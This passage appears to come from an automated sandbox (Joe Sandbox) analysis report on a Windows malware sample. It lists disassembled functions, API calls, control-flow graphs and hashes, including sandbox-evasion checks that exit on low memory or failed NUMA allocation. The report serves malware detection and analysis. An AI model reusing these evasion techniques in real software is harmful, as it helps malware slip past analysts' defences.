                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: b798ff702bc494dd92e73e35c5c78abf65ef4b824ef6c19e67f62f7ac1e0f032
                                • Instruction ID: c2daf637d70eb2ed0706b7e79220050b3fa9b0aa2b8660429c093775b3757f57
                                • Opcode Fuzzy Hash: b798ff702bc494dd92e73e35c5c78abf65ef4b824ef6c19e67f62f7ac1e0f032
                                • Instruction Fuzzy Hash: CE51B034A14303EFC720AF76DD84A2BBBF5FF45708B91482DE456D2A01DBB4E549AB24
                                Function 00C92740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2782 c92740-c92783 GetWindowsDirectoryA 2783 c9278c-c927ea GetVolumeInformationA 2782->2783 2784 c92785 2782->2784 2785 c927ec-c927f2 2783->2785 2784->2783 2786 c92809-c92820 GetProcessHeap RtlAllocateHeap 2785->2786 2787 c927f4-c92807 2785->2787 2788 c92822-c92824 2786->2788 2789 c92826-c92844 wsprintfA 2786->2789 2787->2785 2790 c9285b-c92872 call c971e0 2788->2790 2789->2790
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00C9277B
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00C893B6,00000000,00000000,00000000,00000000), ref: 00C927AC
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C9280F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C92816
                                • wsprintfA.USER32 ref: 00C9283B
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                • String ID: :\$C
                                • API String ID: 2572753744-3309953409
                                • Opcode ID: fc28c8ac9285ae0b40b93cb8f282bd198142022965022b3e6ff876f8a3aa9926
                                • Instruction ID: 97c00acde125bfd14747e58a0db307ec6e3fc891ff59bb88479a169faf9859ff
                                • Opcode Fuzzy Hash: fc28c8ac9285ae0b40b93cb8f282bd198142022965022b3e6ff876f8a3aa9926
                                • Instruction Fuzzy Hash: 023161B2904209AFCB04CFB98A899EFBFBCEF5D750F104169E515F7650E6349A408BA1
                                Function 00C74BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2793 c74bc0-c74bce 2794 c74bd0-c74bd5 2793->2794 2794->2794 2795 c74bd7-c74c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call c72a20 2794->2795
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00C74BF7
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00C74C01
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00C74C0B
                                • lstrlen.KERNEL32(?,00000000,?), ref: 00C74C1F
                                • InternetCrackUrlA.WININET(?,00000000), ref: 00C74C27
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@$CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1683549937-4251816714
                                • Opcode ID: 0877cd05a966719647271ebdf1821582089510cf83c5c714d7a983ffdcae9368
                                • Instruction ID: 004c00b8aa95a048d96ae6c4f0d9e3cd3b27d7a2478d1e5084ca3873621ff46d
                                • Opcode Fuzzy Hash: 0877cd05a966719647271ebdf1821582089510cf83c5c714d7a983ffdcae9368
                                • Instruction Fuzzy Hash: 42012D71D00218AFDB14DFA9EC45B9EBBB8EB49320F008166F918E7390DB7459048FD4
                                Function 00C71030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2798 c71030-c71055 GetCurrentProcess VirtualAllocExNuma 2799 c71057-c71058 ExitProcess 2798->2799 2800 c7105e-c7107b VirtualAlloc 2798->2800 2801 c71082-c71088 2800->2801 2802 c7107d-c71080 2800->2802 2803 c710b1-c710b6 2801->2803 2804 c7108a-c710ab VirtualFree 2801->2804 2802->2801 2804->2803
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C71046
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00C7104D
                                • ExitProcess.KERNEL32 ref: 00C71058
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00C7106C
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00C710AB
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                • String ID:
                                • API String ID: 3477276466-0
                                • Opcode ID: 79b1d9204f16cb2eafcd5fd9b20906cdaca4a899c8da86350b97611fb4891c11
                                • Instruction ID: 05cd21777fce458dd13aff778e02a2e78a96d9b859536d950e8fbb1a519a57c7
                                • Opcode Fuzzy Hash: 79b1d9204f16cb2eafcd5fd9b20906cdaca4a899c8da86350b97611fb4891c11
                                • Instruction Fuzzy Hash: D901F4717802047FE7204A7A6C5AF6B77ADA78AB01F308014FB08F72C0DAB1FA048664
                                Function 00C8EE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2805 c8ee90-c8eeb5 call c72930 2808 c8eec9-c8eecd call c76c40 2805->2808 2809 c8eeb7-c8eebf 2805->2809 2812 c8eed2-c8eee8 StrCmpCA 2808->2812 2809->2808 2810 c8eec1-c8eec3 lstrcpy 2809->2810 2810->2808 2813 c8eeea-c8ef02 call c72a20 call c72930 2812->2813 2814 c8ef11-c8ef18 call c72a20 2812->2814 2823 c8ef04-c8ef0c 2813->2823 2824 c8ef45-c8efa0 call c72a20 * 10 2813->2824 2820 c8ef20-c8ef28 2814->2820 2820->2820 2822 c8ef2a-c8ef37 call c72930 2820->2822 2822->2824 2831 c8ef39 2822->2831 2823->2824 2827 c8ef0e-c8ef0f 2823->2827 2830 c8ef3e-c8ef3f lstrcpy 2827->2830 2830->2824 2831->2830
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8EEC3
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 00C8EEDE
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 00C8EF3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID: ERROR
                                • API String ID: 3722407311-2861137601
                                • Opcode ID: 13cb6fabf2d5ee9ca0794526c53f7d980f42feef8b389dcb477027a590bc448c
                                • Instruction ID: 22b68fb0c86850fb2be9047f8da4269a783c4d2136a391abe60c667fb64aab97
                                • Opcode Fuzzy Hash: 13cb6fabf2d5ee9ca0794526c53f7d980f42feef8b389dcb477027a590bc448c
                                • Instruction Fuzzy Hash: 7A2127306202069FCB65FFB9DC46A9A37E4EF55318F04D438B95EDB202DA30ED01AB94
                                Function 00C710C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2886 c710c0-c710cb 2887 c710d0-c710dc 2886->2887 2889 c710de-c710f3 GlobalMemoryStatusEx 2887->2889 2890 c710f5-c71106 2889->2890 2891 c71112-c71114 ExitProcess 2889->2891 2892 c7111a-c7111d 2890->2892 2893 c71108 2890->2893 2893->2891 2894 c7110a-c71110 2893->2894 2894->2891 2894->2892
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: 662ef61a09c2dcbce8de1aef981b1ec79576e1e7557f6ff67fac6646286cc8e5
                                • Instruction ID: 776e3fd8759692a15dfaaed9018cd1720bd76d3b86ca059be571188e9af607fc
                                • Opcode Fuzzy Hash: 662ef61a09c2dcbce8de1aef981b1ec79576e1e7557f6ff67fac6646286cc8e5
                                • Instruction Fuzzy Hash: 1CF05C701182448BEB106A6DDC4B32EF7D8FB053E0F68C929DEEFC6181E230D840A127
                                Function 00C88C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2895 c88c88-c88cc4 StrCmpCA 2897 c88ccd-c88ce6 2895->2897 2898 c88cc6-c88cc7 ExitProcess 2895->2898 2900 c88cec-c88cf1 2897->2900 2901 c88ee2-c88eef call c72a20 2897->2901 2902 c88cf6-c88cf9 2900->2902 2904 c88cff 2902->2904 2905 c88ec3-c88edc 2902->2905 2907 c88e88-c88e9a lstrlen 2904->2907 2908 c88e6f-c88e7d StrCmpCA 2904->2908 2909 c88d84-c88d92 StrCmpCA 2904->2909 2910 c88da4-c88db8 StrCmpCA 2904->2910 2911 c88d06-c88d15 lstrlen 2904->2911 2912 c88d5a-c88d69 lstrlen 2904->2912 2913 c88dbd-c88dcb StrCmpCA 2904->2913 2914 c88ddd-c88deb StrCmpCA 2904->2914 2915 c88dfd-c88e0b StrCmpCA 2904->2915 2916 c88e1d-c88e2b StrCmpCA 2904->2916 2917 c88e3d-c88e4b StrCmpCA 2904->2917 2918 c88d30-c88d3f lstrlen 2904->2918 2919 c88e56-c88e64 StrCmpCA 2904->2919 2905->2901 2945 c88cf3 2905->2945 2927 c88e9c-c88ea1 call c72a20 2907->2927 2928 c88ea4-c88eb0 call c72930 2907->2928 2908->2905 2926 c88e7f-c88e86 2908->2926 2909->2905 2934 c88d98-c88d9f 2909->2934 2910->2905 2922 c88d1f-c88d2b call c72930 2911->2922 2923 c88d17-c88d1c call c72a20 2911->2923 2931 c88d6b-c88d70 call c72a20 2912->2931 2932 c88d73-c88d7f call c72930 2912->2932 2913->2905 2935 c88dd1-c88dd8 2913->2935 2914->2905 2936 c88df1-c88df8 2914->2936 2915->2905 2920 c88e11-c88e18 2915->2920 2916->2905 2921 c88e31-c88e38 2916->2921 2917->2905 2924 c88e4d-c88e54 2917->2924 2929 c88d49-c88d55 call c72930 2918->2929 2930 c88d41-c88d46 call c72a20 2918->2930 2919->2905 2925 c88e66-c88e6d 2919->2925 2920->2905 2921->2905 2954 c88eb3-c88eb5 2922->2954 2923->2922 2924->2905 2925->2905 2926->2905 2927->2928 2928->2954 2929->2954 2930->2929 2931->2932 2932->2954 2934->2905 2935->2905 2936->2905 2945->2902 2954->2905 2955 c88eb7-c88eb9 2954->2955 2955->2905 2956 c88ebb-c88ebd lstrcpy 2955->2956 2956->2905
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 78be50a506ececf2612b1583f85ba31189df5e7ca65d6214edc8f0a225c306a3
                                • Instruction ID: 10f7b39e47898f27ebb26fdabdade60648268d624e401104c4008ae1fd33f610
                                • Opcode Fuzzy Hash: 78be50a506ececf2612b1583f85ba31189df5e7ca65d6214edc8f0a225c306a3
                                • Instruction Fuzzy Hash: 9EE0D814244246ABCB1867F54C648D67FD9CF85210B410439B5018BA82E9686D49C329
                                Function 00EC135A Relevance: 1.3, APIs: 1, Instructions: 22memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNEL32(00000000), ref: 00EC1477
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: fa2cb3584bebfa68d7b7583465c84bf8b45e8f57088ab5bb08c372fecd5bb176
                                • Instruction ID: c5352d4be7e8945ed83518b11afe5a465b8d68314cc551cfb05231b136f4f1e9
                                • Opcode Fuzzy Hash: fa2cb3584bebfa68d7b7583465c84bf8b45e8f57088ab5bb08c372fecd5bb176
                                • Instruction Fuzzy Hash: 63F0A5B1008709CBD7013F6888486ADBBE4FF15721F121A5DD9D192650E67258A0CB8B

                                Non-executed Functions

                                Function 00C82390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C823D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C823F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C82402
                                • lstrlen.KERNEL32(\*.*), ref: 00C8240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 00C82436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00C82486
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 2a6568a5a5cba93fd5fded856071aa0e5080ac890e9837bbf2b7601ed029375e
                                • Instruction ID: 01f3680e888fbe850b211f24bc8de5cdab9b7853f6f9b89b2d470b966383371e
